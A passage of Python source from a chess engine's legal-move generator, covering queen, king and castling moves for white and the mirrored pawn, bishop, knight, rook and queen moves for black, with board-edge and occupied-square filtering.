elif self.white_queens_inf[i][0] - j == self.white_occupation_x[k] and self.white_queens_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "W" and int(move[9]) >= j:
queen_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.black_occupation_x)):
if self.white_queens_inf[i][0] == self.black_occupation_x[k] and self.white_queens_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] + j == self.black_occupation_x[k] and self.white_queens_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "E" and int(move[9]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] + j == self.black_occupation_x[k] and self.white_queens_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "E" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] + j == self.black_occupation_x[k] and self.white_queens_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "E" and int(move[9]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] == self.black_occupation_x[k] and self.white_queens_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] - j == self.black_occupation_x[k] and self.white_queens_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "W" and int(move[9]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] - j == self.black_occupation_x[k] and self.white_queens_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "W" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] - j == self.black_occupation_x[k] and self.white_queens_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "W" and int(move[9]) > j:
queen_moves[move] = False
for move in move_list:
if queen_moves[move] == True:
if move[6] == "N" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0], self.white_queens_inf[i][1] + int(move[8])))
elif move[6] == "N" and move[7] == "E":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0] + int(move[9]), self.white_queens_inf[i][1] + int(move[9])))
elif move[6] == "E" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0] + int(move[8]), self.white_queens_inf[i][1]))
elif move[6] == "S" and move[7] == "E":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0] + int(move[9]), self.white_queens_inf[i][1] - int(move[9])))
elif move[6] == "S" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0], self.white_queens_inf[i][1] - int(move[8])))
elif move[6] == "S" and move[7] == "W":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0] - int(move[9]), self.white_queens_inf[i][1] - int(move[9])))
elif move[6] == "W" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0] - int(move[8]), self.white_queens_inf[i][1]))
elif move[6] == "N" and move[7] == "W":
self.legal_moves.append(notation.get_notation("Q", self.white_queens_inf[i][0], self.white_queens_inf[i][1], self.white_queens_inf[i][0] - int(move[9]), self.white_queens_inf[i][1] + int(move[9])))
if self.white_king_inf[0][2] == True:
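# King: one-square steps in the eight directions, filtered by board edges and
# squares occupied by friendly pieces.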
move_list = ["king_N_1", "king_NE_1", "king_E_1", "king_SE_1", "king_S_1", "king_SW_1", "king_W_1", "king_NW_1"]
king_moves = {move: True for move in move_list}
if self.white_king_inf[0][0] - 1 < 0:
for move in move_list:
if move[5] == "W" or move[6] == "W":
king_moves[move] = False
if self.white_king_inf[0][1] - 1 < 0:
for move in move_list:
if move[5] == "S":
king_moves[move] = False
if self.white_king_inf[0][0] + 1 > 7:
for move in move_list:
if move[5] == "E" or move[6] == "E":
king_moves[move] = False
if self.white_king_inf[0][1] + 1 > 7:
for move in move_list:
if move[5] == "N":
king_moves[move] = False
for i in range(0, len(self.white_occupation_x)):
if self.white_king_inf[0][0] == self.white_occupation_x[i] and self.white_king_inf[0][1] + 1 == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "N" and move[6] == "_":
king_moves[move] = False
elif self.white_king_inf[0][0] + 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] + 1 == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "N" and move[6] == "E":
king_moves[move] = False
elif self.white_king_inf[0][0] + 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "E" and move[6] == "_":
king_moves[move] = False
elif self.white_king_inf[0][0] + 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] - 1 == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "S" and move[6] == "E":
king_moves[move] = False
elif self.white_king_inf[0][0] == self.white_occupation_x[i] and self.white_king_inf[0][1] - 1 == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "S" and move[6] == "_":
king_moves[move] = False
elif self.white_king_inf[0][0] - 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] - 1 == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "S" and move[6] == "W":
king_moves[move] = False
elif self.white_king_inf[0][0] - 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "W" and move[6] == "_":
king_moves[move] = False
elif self.white_king_inf[0][0] - 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] + 1 == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "N" and move[6] == "W":
king_moves[move] = False
for move in move_list:
if king_moves[move] == True:
if move[5] == "N" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0], self.white_king_inf[0][1] + 1))
elif move[5] == "N" and move[6] == "E":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0] + 1, self.white_king_inf[0][1] + 1))
elif move[5] == "E" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0] + 1, self.white_king_inf[0][1]))
elif move[5] == "S" and move[6] == "E":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0] + 1, self.white_king_inf[0][1] - 1))
elif move[5] == "S" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0], self.white_king_inf[0][1] - 1))
elif move[5] == "S" and move[6] == "W":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0] - 1, self.white_king_inf[0][1] - 1))
elif move[5] == "W" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0] - 1, self.white_king_inf[0][1]))
elif move[5] == "N" and move[6] == "W":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0] - 1, self.white_king_inf[0][1] + 1))
if self.white_king_inf[0][2] == True and self.white_king_inf[0][3] == True:
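# Castling: only considered while the king is alive and unmoved (index 3). The squares
# between king and rook must be empty of either colour; rook 0 (queenside) must be
# alive and unmoved for O-O-O, rook 1 (kingside) for O-O.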
move_list = ["O-O", "O-O-O"]
king_moves = {
"O-O" : True,
"O-O-O" : True,
}
for i in range(0, len(self.white_occupation_x)):
if self.white_king_inf[0][0] + 2 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O"] = False
elif self.white_king_inf[0][0] + 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O"] = False
if self.white_king_inf[0][0] - 3 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.white_king_inf[0][0] - 2 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.white_king_inf[0][0] - 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O-O"] = False
for i in range(0, len(self.black_occupation_x)):
if self.white_king_inf[0][0] + 2 == self.black_occupation_x[i] and self.white_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O"] = False
elif self.white_king_inf[0][0] + 1 == self.black_occupation_x[i] and self.white_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O"] = False
if self.white_king_inf[0][0] - 3 == self.black_occupation_x[i] and self.white_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.white_king_inf[0][0] - 2 == self.black_occupation_x[i] and self.white_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.white_king_inf[0][0] - 1 == self.black_occupation_x[i] and self.white_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O-O"] = False
for i in range(0, 2):
if self.white_rooks_inf[i][2] == False or self.white_rooks_inf[i][3] == False:
if i == 0:
king_moves["O-O-O"] = False
elif i == 1:
king_moves["O-O"] = False
for move in move_list:
if king_moves[move] == True:
self.legal_moves.append(move)
else:
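# Black to move: the same generation mirrored, with pawns pushing towards lower
# y values and promotion handled by the trailing "=" in the notation string.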
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True:
pawn_S_1 = True
pawn_S_2 = True
pawn_SE_11 = False
pawn_SW_11 = False
for j in range(0, len(self.black_occupation_x)):
if self.black_pawns_inf[i][0] == self.black_occupation_x[j] and self.black_pawns_inf[i][1] - 1 == self.black_occupation_y[j]:
pawn_S_1 = False
if self.black_pawns_inf[i][3] == True and self.black_pawns_inf[i][0] == self.black_occupation_x[j] and self.black_pawns_inf[i][1] - 2 == self.black_occupation_y[j]:
pawn_S_2 = False
for j in range(0, len(self.white_occupation_x)):
if self.black_pawns_inf[i][0] == self.white_occupation_x[j] and self.black_pawns_inf[i][1] - 1 == self.white_occupation_y[j]:
pawn_S_1 = False
if self.black_pawns_inf[i][3] == True and self.black_pawns_inf[i][0] == self.white_occupation_x[j] and self.black_pawns_inf[i][1] - 2 == self.white_occupation_y[j]:
pawn_S_2 = False
if self.black_pawns_inf[i][0] + 1 == self.white_occupation_x[j] and self.black_pawns_inf[i][1] - 1 == self.white_occupation_y[j]:
pawn_SE_11 = True
if self.black_pawns_inf[i][0] - 1 == self.white_occupation_x[j] and self.black_pawns_inf[i][1] - 1 == self.white_occupation_y[j]:
pawn_SW_11 = True
if self.black_pawns_inf[i][0] + 1 == self.en_passant_x_y[0] and self.black_pawns_inf[i][1] == self.en_passant_x_y[1]:
pawn_SE_11 = True
elif self.black_pawns_inf[i][0] - 1 == self.en_passant_x_y[0] and self.black_pawns_inf[i][1] == self.en_passant_x_y[1]:
pawn_SW_11 = True
if pawn_S_1 == True:
legal_move_notation = notation.get_notation("P", self.black_pawns_inf[i][0], self.black_pawns_inf[i][1], self.black_pawns_inf[i][0], self.black_pawns_inf[i][1] - 1)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
if pawn_S_2 == True and pawn_S_1 == True and self.black_pawns_inf[i][3] == True:
legal_move_notation = notation.get_notation("P", self.black_pawns_inf[i][0], self.black_pawns_inf[i][1], self.black_pawns_inf[i][0], self.black_pawns_inf[i][1] - 2)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
if pawn_SE_11 == True:
legal_move_notation = notation.get_notation("P", self.black_pawns_inf[i][0], self.black_pawns_inf[i][1], self.black_pawns_inf[i][0] + 1, self.black_pawns_inf[i][1] - 1)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
if pawn_SW_11 == True:
legal_move_notation = notation.get_notation("P", self.black_pawns_inf[i][0], self.black_pawns_inf[i][1], self.black_pawns_inf[i][0] - 1, self.black_pawns_inf[i][1] - 1)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True:
move_list = ["bishop_NE_1", "bishop_NE_2", "bishop_NE_3", "bishop_NE_4", "bishop_NE_5", "bishop_NE_6", "bishop_NE_7", "bishop_SE_1", "bishop_SE_2", "bishop_SE_3", "bishop_SE_4", "bishop_SE_5", "bishop_SE_6", "bishop_SE_7", "bishop_SW_1", "bishop_SW_2", "bishop_SW_3", "bishop_SW_4", "bishop_SW_5", "bishop_SW_6", "bishop_SW_7", "bishop_NW_1", "bishop_NW_2", "bishop_NW_3", "bishop_NW_4", "bishop_NW_5", "bishop_NW_6", "bishop_NW_7"]
bishop_moves = {
"bishop_NE_1" : True,
"bishop_NE_2" : True,
"bishop_NE_3" : True,
"bishop_NE_4" : True,
"bishop_NE_5" : True,
"bishop_NE_6" : True,
"bishop_NE_7" : True,
"bishop_SE_1" : True,
"bishop_SE_2" : True,
"bishop_SE_3" : True,
"bishop_SE_4" : True,
"bishop_SE_5" : True,
"bishop_SE_6" : True,
"bishop_SE_7" : True,
"bishop_SW_1" : True,
"bishop_SW_2" : True,
"bishop_SW_3" : True,
"bishop_SW_4" : True,
"bishop_SW_5" : True,
"bishop_SW_6" : True,
"bishop_SW_7" : True,
"bishop_NW_1" : True,
"bishop_NW_2" : True,
"bishop_NW_3" : True,
"bishop_NW_4" : True,
"bishop_NW_5" : True,
"bishop_NW_6" : True,
"bishop_NW_7" : True,
}
for j in range(1, 8):
if self.black_bishops_inf[i][0] - j < 0:
for move in move_list:
if move[8] == "W" and int(move[10]) >= j:
bishop_moves[move] = False
if self.black_bishops_inf[i][1] - j < 0:
for move in move_list:
if move[7] == "S" and int(move[10]) >= j:
bishop_moves[move] = False
if self.black_bishops_inf[i][0] + j > 7:
for move in move_list:
if move[8] == "E" and int(move[10]) >= j:
bishop_moves[move] = False
if self.black_bishops_inf[i][1] + j > 7:
for move in move_list:
if move[7] == "N" and int(move[10]) >= j:
bishop_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.black_occupation_x)):
if self.black_bishops_inf[i][0] + j == self.black_occupation_x[k] and self.black_bishops_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "E" and int(move[10]) >= j:
bishop_moves[move] = False
elif self.black_bishops_inf[i][0] + j == self.black_occupation_x[k] and self.black_bishops_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "E" and int(move[10]) >= j:
bishop_moves[move] = False
elif self.black_bishops_inf[i][0] - j == self.black_occupation_x[k] and self.black_bishops_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "W" and int(move[10]) >= j:
bishop_moves[move] = False
elif self.black_bishops_inf[i][0] - j == self.black_occupation_x[k] and self.black_bishops_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "W" and int(move[10]) >= j:
bishop_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.white_occupation_x)):
if self.black_bishops_inf[i][0] + j == self.white_occupation_x[k] and self.black_bishops_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "E" and int(move[10]) > j:
bishop_moves[move] = False
elif self.black_bishops_inf[i][0] + j == self.white_occupation_x[k] and self.black_bishops_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "E" and int(move[10]) > j:
bishop_moves[move] = False
elif self.black_bishops_inf[i][0] - j == self.white_occupation_x[k] and self.black_bishops_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "W" and int(move[10]) > j:
bishop_moves[move] = False
elif self.black_bishops_inf[i][0] - j == self.white_occupation_x[k] and self.black_bishops_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "W" and int(move[10]) > j:
bishop_moves[move] = False
for move in move_list:
if bishop_moves[move] == True:
if move[7] == "N" and move[8] == "E":
self.legal_moves.append(notation.get_notation("B", self.black_bishops_inf[i][0], self.black_bishops_inf[i][1], self.black_bishops_inf[i][0] + int(move[10]), self.black_bishops_inf[i][1] + int(move[10])))
elif move[7] == "S" and move[8] == "E":
self.legal_moves.append(notation.get_notation("B", self.black_bishops_inf[i][0], self.black_bishops_inf[i][1], self.black_bishops_inf[i][0] + int(move[10]), self.black_bishops_inf[i][1] - int(move[10])))
elif move[7] == "S" and move[8] == "W":
self.legal_moves.append(notation.get_notation("B", self.black_bishops_inf[i][0], self.black_bishops_inf[i][1], self.black_bishops_inf[i][0] - int(move[10]), self.black_bishops_inf[i][1] - int(move[10])))
elif move[7] == "N" and move[8] == "W":
self.legal_moves.append(notation.get_notation("B", self.black_bishops_inf[i][0], self.black_bishops_inf[i][1], self.black_bishops_inf[i][0] - int(move[10]), self.black_bishops_inf[i][1] + int(move[10])))
for i in range(0, 10):
if self.black_knights_inf[i][2] == True:
knight_NE_21 = True
knight_NE_12 = True
knight_SE_12 = True
knight_SE_21 = True
knight_SW_21 = True
knight_SW_12 = True
knight_NW_12 = True
knight_NW_21 = True
if self.black_knights_inf[i][0] - 1 < 0:
knight_SW_21 = False
knight_SW_12 = False
knight_NW_12 = False
knight_NW_21 = False
elif self.black_knights_inf[i][0] - 2 < 0:
knight_SW_12 = False
knight_NW_12 = False
if self.black_knights_inf[i][0] + 1 > 7:
knight_NE_21 = False
knight_NE_12 = False
knight_SE_12 = False
knight_SE_21 = False
elif self.black_knights_inf[i][0] + 2 > 7:
knight_NE_12 = False
knight_SE_12 = False
if self.black_knights_inf[i][1] - 1 < 0:
knight_SE_12 = False
knight_SE_21 = False
knight_SW_21 = False
knight_SW_12 = False
elif self.black_knights_inf[i][1] - 2 < 0:
knight_SE_21 = False
knight_SW_21 = False
if self.black_knights_inf[i][1] + 1 > 7:
knight_NE_21 = False
knight_NE_12 = False
knight_NW_12 = False
knight_NW_21 = False
elif self.black_knights_inf[i][1] + 2 > 7:
knight_NE_21 = False
knight_NW_21 = False
for j in range(0, len(self.black_occupation_x)):
if self.black_knights_inf[i][0] + 1 == self.black_occupation_x[j] and self.black_knights_inf[i][1] + 2 == self.black_occupation_y[j]:
knight_NE_21 = False
if self.black_knights_inf[i][0] + 2 == self.black_occupation_x[j] and self.black_knights_inf[i][1] + 1 == self.black_occupation_y[j]:
knight_NE_12 = False
if self.black_knights_inf[i][0] + 2 == self.black_occupation_x[j] and self.black_knights_inf[i][1] - 1 == self.black_occupation_y[j]:
knight_SE_12 = False
if self.black_knights_inf[i][0] + 1 == self.black_occupation_x[j] and self.black_knights_inf[i][1] - 2 == self.black_occupation_y[j]:
knight_SE_21 = False
if self.black_knights_inf[i][0] - 1 == self.black_occupation_x[j] and self.black_knights_inf[i][1] - 2 == self.black_occupation_y[j]:
knight_SW_21 = False
if self.black_knights_inf[i][0] - 2 == self.black_occupation_x[j] and self.black_knights_inf[i][1] - 1 == self.black_occupation_y[j]:
knight_SW_12 = False
if self.black_knights_inf[i][0] - 2 == self.black_occupation_x[j] and self.black_knights_inf[i][1] + 1 == self.black_occupation_y[j]:
knight_NW_12 = False
if self.black_knights_inf[i][0] - 1 == self.black_occupation_x[j] and self.black_knights_inf[i][1] + 2 == self.black_occupation_y[j]:
knight_NW_21 = False
if knight_NE_21 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] + 1, self.black_knights_inf[i][1] + 2))
if knight_NE_12 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] + 2, self.black_knights_inf[i][1] + 1))
if knight_SE_12 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] + 2, self.black_knights_inf[i][1] - 1))
if knight_SE_21 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] + 1, self.black_knights_inf[i][1] - 2))
if knight_SW_21 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] - 1, self.black_knights_inf[i][1] - 2))
if knight_SW_12 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] - 2, self.black_knights_inf[i][1] - 1))
if knight_NW_12 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] - 2, self.black_knights_inf[i][1] + 1))
if knight_NW_21 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] - 1, self.black_knights_inf[i][1] + 2))
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True:
move_list = ["rook_N_1", "rook_N_2", "rook_N_3", "rook_N_4", "rook_N_5", "rook_N_6", "rook_N_7", "rook_E_1", "rook_E_2", "rook_E_3", "rook_E_4", "rook_E_5", "rook_E_6", "rook_E_7", "rook_S_1", "rook_S_2", "rook_S_3", "rook_S_4", "rook_S_5", "rook_S_6", "rook_S_7", "rook_W_1", "rook_W_2", "rook_W_3", "rook_W_4", "rook_W_5", "rook_W_6", "rook_W_7"]
rook_moves = {
"rook_N_1" : True,
"rook_N_2" : True,
"rook_N_3" : True,
"rook_N_4" : True,
"rook_N_5" : True,
"rook_N_6" : True,
"rook_N_7" : True,
"rook_E_1" : True,
"rook_E_2" : True,
"rook_E_3" : True,
"rook_E_4" : True,
"rook_E_5" : True,
"rook_E_6" : True,
"rook_E_7" : True,
"rook_S_1" : True,
"rook_S_2" : True,
"rook_S_3" : True,
"rook_S_4" : True,
"rook_S_5" : True,
"rook_S_6" : True,
"rook_S_7" : True,
"rook_W_1" : True,
"rook_W_2" : True,
"rook_W_3" : True,
"rook_W_4" : True,
"rook_W_5" : True,
"rook_W_6" : True,
"rook_W_7" : True,
}
for j in range(1, 8):
if self.black_rooks_inf[i][0] - j < 0:
for move in move_list:
if move[5] == "W" and int(move[7]) >= j:
rook_moves[move] = False
if self.black_rooks_inf[i][1] - j < 0:
for move in move_list:
if move[5] == "S" and int(move[7]) >= j:
rook_moves[move] = False
if self.black_rooks_inf[i][0] + j > 7:
for move in move_list:
if move[5] == "E" and int(move[7]) >= j:
rook_moves[move] = False
if self.black_rooks_inf[i][1] + j > 7:
for move in move_list:
if move[5] == "N" and int(move[7]) >= j:
rook_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.black_occupation_x)):
if self.black_rooks_inf[i][0] == self.black_occupation_x[k] and self.black_rooks_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "N" and int(move[7]) >= j:
rook_moves[move] = False
elif self.black_rooks_inf[i][0] + j == self.black_occupation_x[k] and self.black_rooks_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "E" and int(move[7]) >= j:
rook_moves[move] = False
elif self.black_rooks_inf[i][0] == self.black_occupation_x[k] and self.black_rooks_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "S" and int(move[7]) >= j:
rook_moves[move] = False
elif self.black_rooks_inf[i][0] - j == self.black_occupation_x[k] and self.black_rooks_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "W" and int(move[7]) >= j:
rook_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.white_occupation_x)):
if self.black_rooks_inf[i][0] == self.white_occupation_x[k] and self.black_rooks_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "N" and int(move[7]) > j:
rook_moves[move] = False
elif self.black_rooks_inf[i][0] + j == self.white_occupation_x[k] and self.black_rooks_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "E" and int(move[7]) > j:
rook_moves[move] = False
elif self.black_rooks_inf[i][0] == self.white_occupation_x[k] and self.black_rooks_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "S" and int(move[7]) > j:
rook_moves[move] = False
elif self.black_rooks_inf[i][0] - j == self.white_occupation_x[k] and self.black_rooks_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "W" and int(move[7]) > j:
rook_moves[move] = False
for move in move_list:
if rook_moves[move] == True:
if move[5] == "N":
self.legal_moves.append(notation.get_notation("R", self.black_rooks_inf[i][0], self.black_rooks_inf[i][1], self.black_rooks_inf[i][0], self.black_rooks_inf[i][1] + int(move[7])))
elif move[5] == "E":
self.legal_moves.append(notation.get_notation("R", self.black_rooks_inf[i][0], self.black_rooks_inf[i][1], self.black_rooks_inf[i][0] + int(move[7]), self.black_rooks_inf[i][1]))
elif move[5] == "S":
self.legal_moves.append(notation.get_notation("R", self.black_rooks_inf[i][0], self.black_rooks_inf[i][1], self.black_rooks_inf[i][0], self.black_rooks_inf[i][1] - int(move[7])))
elif move[5] == "W":
self.legal_moves.append(notation.get_notation("R", self.black_rooks_inf[i][0], self.black_rooks_inf[i][1], self.black_rooks_inf[i][0] - int(move[7]), self.black_rooks_inf[i][1]))
for i in range(0, 9):
if self.black_queens_inf[i][2] == True:
move_list = ["queen_N_1", "queen_N_2", "queen_N_3", "queen_N_4", "queen_N_5", "queen_N_6", "queen_N_7", "queen_NE_1", "queen_NE_2", "queen_NE_3", "queen_NE_4", "queen_NE_5", "queen_NE_6", "queen_NE_7", "queen_E_1", "queen_E_2", "queen_E_3", "queen_E_4", "queen_E_5", "queen_E_6", "queen_E_7", "queen_SE_1", "queen_SE_2", "queen_SE_3", "queen_SE_4", "queen_SE_5", "queen_SE_6", "queen_SE_7", "queen_S_1", "queen_S_2", "queen_S_3", "queen_S_4", "queen_S_5", "queen_S_6", "queen_S_7", "queen_SW_1", "queen_SW_2", "queen_SW_3", "queen_SW_4", "queen_SW_5", "queen_SW_6", "queen_SW_7", "queen_W_1", "queen_W_2", "queen_W_3", "queen_W_4", "queen_W_5", "queen_W_6", "queen_W_7", "queen_NW_1", "queen_NW_2", "queen_NW_3", "queen_NW_4", "queen_NW_5", "queen_NW_6", "queen_NW_7"]
queen_moves = {
"queen_N_1" : True,
"queen_N_2" : True,
"queen_N_3" : True,
"queen_N_4" : True,
"queen_N_5" : True,
"queen_N_6" : True,
"queen_N_7" : True,
"queen_NE_1" : True,
"queen_NE_2" : True,
"queen_NE_3" : True,
"queen_NE_4" : True,
"queen_NE_5" : True,
"queen_NE_6" : True,
"queen_NE_7" : True,
"queen_E_1" : True,
"queen_E_2" : True,
"queen_E_3" : True,
"queen_E_4" : True,
"queen_E_5" : True,
"queen_E_6" : True,
"queen_E_7" : True,
"queen_SE_1" : True,
"queen_SE_2" : True,
"queen_SE_3" : True,
"queen_SE_4" : True,
"queen_SE_5" : True,
"queen_SE_6" : True,
"queen_SE_7" : True,
"queen_S_1" : True,
"queen_S_2" : True,
"queen_S_3" : True,
"queen_S_4" : True,
"queen_S_5" : True,
"queen_S_6" : True,
"queen_S_7" : True,
"queen_SW_1" : True,
"queen_SW_2" : True,
"queen_SW_3" : True,
"queen_SW_4" : True,
"queen_SW_5" : True,
"queen_SW_6" : True,
"queen_SW_7" : True,
"queen_W_1" : True,
"queen_W_2" : True,
"queen_W_3" : True,
"queen_W_4" : True,
"queen_W_5" : True,
"queen_W_6" : True,
"queen_W_7" : True,
"queen_NW_1" : True,
"queen_NW_2" : True,
"queen_NW_3" : True,
"queen_NW_4" : True,
"queen_NW_5" : True,
"queen_NW_6" : True,
"queen_NW_7" : True,
}
for j in range(1, 8):
if self.black_queens_inf[i][0] - j < 0:
for move in move_list:
if move[6] == "W" or move[7] == "W":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
if self.black_queens_inf[i][1] - j < 0:
for move in move_list:
if move[6] == "S":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
if self.black_queens_inf[i][0] + j > 7:
for move in move_list:
if move[6] == "E" or move[7] == "E":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
if self.black_queens_inf[i][1] + j > 7:
